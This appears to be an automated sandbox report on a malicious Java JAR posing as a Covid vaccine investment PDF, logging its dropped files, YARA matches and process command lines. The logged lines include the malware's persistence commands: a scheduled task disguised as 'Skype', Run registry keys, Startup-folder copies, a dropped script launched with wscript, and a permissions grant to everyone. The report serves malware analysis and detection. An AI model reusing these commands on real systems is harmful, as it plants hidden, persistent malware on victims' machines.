Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 0000000B.00000002.238157882.0000000004EA7000.00000004.00000001.sdmp | String found in binary or memory: https://api.github.com/_private/browser/errors
Source: javaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238157882.0000000004EA7000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.240964215.000000000A300000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.240871910.000000000A2CE000.00000004.00000001.sdmp | String found in binary or memory: https://github-releases.githubusercontent.com/51361554/623ef000-9da4-11e9-9ea2-d90155318994?X-Amz-Al
Source: javaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmp | String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
Source: javaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238481797.0000000009F6E000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmp | String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
Source: javaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.237181358.0000000004A90000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmp | String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS
            Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS3
            Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPSA
            Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPSc
            Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPSk
            Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPSs
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.108.154:443 -> 192.168.2.3:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.3:49729 version: TLS 1.2
            Source: 00000006.00000002.207844794.0000000014D78000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
            Source: 00000002.00000003.200309664.0000000002C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
            Source: Process Memory Space: 7za.exe PID: 384, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
            Source: C:\jar\keuqzwqbvn\resources\umxybpjabc, type: DROPPEDMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
            Source: C:\Users\user\fukvowbkrs.js, type: DROPPEDMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
            Source: classification engineClassification label: mal80.troj.expl.evad.winJAR@34/30@13/7
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeFile created: C:\Users\user\fukvowbkrs.jsJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3096:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_01
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeSection loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dll
            Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\7za.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: javaw.exeString found in binary or memory: k.in-addr.arpa
            Source: java.exeString found in binary or memory: J-addWaiter
            Source: java.exeString found in binary or memory: k.in-addr.arpa
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
            Source: unknownProcess created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
            Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl >> C:\cmdlinestart.log 2>&1
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl
            Source: unknownProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\fukvowbkrs.js
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\vmlpusjwhz.txt'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: unknownProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
            Source: unknownProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
            Source: unknownProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\fukvowbkrs.js
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

            Data Obfuscation:

Yara detected Allatori_JAR_Obfuscator
Source: Yara match | File source: 00000010.00000002.520726996.0000000009F9E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.352640886.000000000461D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.520047801.000000000A56A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.520214796.000000000A5A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.352612506.0000000004610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.238594494.0000000009FA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.317682510.0000000004E1D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.253231810.000000000A5A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.238481797.0000000009F6E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.317809866.0000000004E65000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.520453366.0000000009F6C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.352788509.0000000004665000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.317648149.0000000004E10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.253164708.000000000A56E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: java.exe PID: 720, type: MEMORY
Source: Yara match | File source: Process Memory Space: java.exe PID: 4952, type: MEMORY
Source: Yara match | File source: Process Memory Space: javaw.exe PID: 3164, type: MEMORY
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Code function: 6_2_0277B377 push 00000000h; mov dword ptr [esp], esp
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Code function: 6_2_0277BB27 push 00000000h; mov dword ptr [esp], esp
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Code function: 6_2_0277B907 push 00000000h; mov dword ptr [esp], esp
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Code function: 6_2_0277A1DB push ecx; ret
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Code function: 6_2_0277A1CA push ecx; ret
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Code function: 6_2_0277C437 push 00000000h; mov dword ptr [esp], esp
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Code function: 6_2_02782D44 push eax; retf
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Code function: 6_2_0281FFF0 pushad ; iretd
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Code function: 6_2_02817C51 push cs; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 11_3_150F0869 push ds; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 11_3_150F0869 push ds; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 11_3_150F0869 push ds; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 11_3_150F0869 push ds; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C721CD push esi; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C7C1D1 push esi; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C7BFD0 push edi; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C7BFE9 push esi; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C73FF3 push eax; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C71BF9 push esi; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C7C180 push edi; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C7C198 push edi; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C7BDA5 pushad ; retf 0015h
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C7BDA1 push edx; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C7BDA9 push edx; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C72151 push ebp; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C7BD67 push edx; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C7BF61 push ebp; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C71B69 push edx; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C71507 push edx; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C7BD01 push ebx; retf
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 13_3_15C71515 push esi; retf

            Persistence and Installation Behavior:

Exploit detected, runtime environment dropped PE file
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | File created: jna7235467147341798336.dll.13.dr
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | File created: C:\Users\user\AppData\Local\Temp\jna-99048687\jna8178706811767784369.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | File created: C:\Users\user\AppData\Local\Temp\jna-99048687\jna6181350368483245817.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | File created: C:\Users\user\AppData\Local\Temp\jna-99048687\jna7235467147341798336.dll

            Boot Survival:

Creates autostart registry keys to launch java
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run plugins "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\plugins.jar" mp
Creates multiple autostart registry keys
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run plugins
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vmlpusjwhz
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmlpusjwhz.txt
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmlpusjwhz.txt
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\vmlpusjwhz.txt
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vmlpusjwhz
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vmlpusjwhz
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run plugins
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run plugins
Source: C:\Windows\SysWOW64\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: unknown | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: java.exe, 00000006.00000003.203419915.0000000014C60000.00000004.00000001.sdmp | Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000006.00000003.203419915.0000000014C60000.00000004.00000001.sdmp | Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000006.00000002.207991849.0000000014FD0000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.220344385.0000000005AB0000.00000002.00000001.sdmp, javaw.exe, 0000000B.00000002.242535927.00000000156C0000.00000002.00000001.sdmp, java.exe, 0000000D.00000002.256904173.0000000015870000.00000002.00000001.sdmp, java.exe, 00000010.00000002.531541742.0000000015FF0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: java.exe, 00000006.00000002.206842992.0000000002675000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.236445612.0000000002870000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.251699367.0000000002DE0000.00000004.00000001.sdmp, java.exe, 00000010.00000002.512262138.0000000002730000.00000004.00000001.sdmp | Binary or memory string: ,java/lang/VirtualMachineError
Source: java.exe, 00000006.00000002.206842992.0000000002675000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.236445612.0000000002870000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.251699367.0000000002DE0000.00000004.00000001.sdmp, java.exe, 00000010.00000002.512262138.0000000002730000.00000004.00000001.sdmp | Binary or memory string: |[Ljava/lang/VirtualMachineError;
Source: java.exe, 00000006.00000003.203419915.0000000014C60000.00000004.00000001.sdmp | Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: java.exe, 00000006.00000003.203419915.0000000014C60000.00000004.00000001.sdmp | Binary or memory string: java/lang/VirtualMachineError.classPK
